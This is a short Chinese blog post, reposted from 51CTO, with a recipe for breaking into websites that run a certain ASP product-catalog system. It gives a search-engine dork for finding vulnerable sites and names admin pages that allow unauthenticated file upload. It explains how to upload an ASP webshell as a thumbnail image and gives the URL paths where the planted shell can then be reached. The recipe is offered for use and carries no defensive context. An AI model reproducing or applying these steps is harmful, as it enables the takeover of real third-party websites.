本文介绍了一种通过特定URL路径上传ASP木马的方法。首先利用inurl搜索找到目标网站,然后通过管理页面上传木马文件。上传成功后,可通过构造特定URL访问已上传的ASP木马。
原漏洞:
搜索 inurl:cpzs.asp?ProClass=
根目录下 /manage/Product/add_news.asp
缩略图上传asp马
提交后,选择EDIT 找到那个asp的名称
构造
http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp
构造
http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp
最新的漏洞:
搜索 inurl:cpzs.asp?ProClass=
根目录下 manage/Product/add_newsclass.asp
直接缩略图上传asp的马
提交后
去选那个EDIT 找到那个你上穿的asp马
构造
http://网址 /UpLoadPic/ProClass_Pic/上传获得的地址.asp
构造
http://网址 /UpLoadPic/ProClass_Pic/上传获得的地址.asp
本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/300745,如需转载请自行联系原作者
扫一扫
4271
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
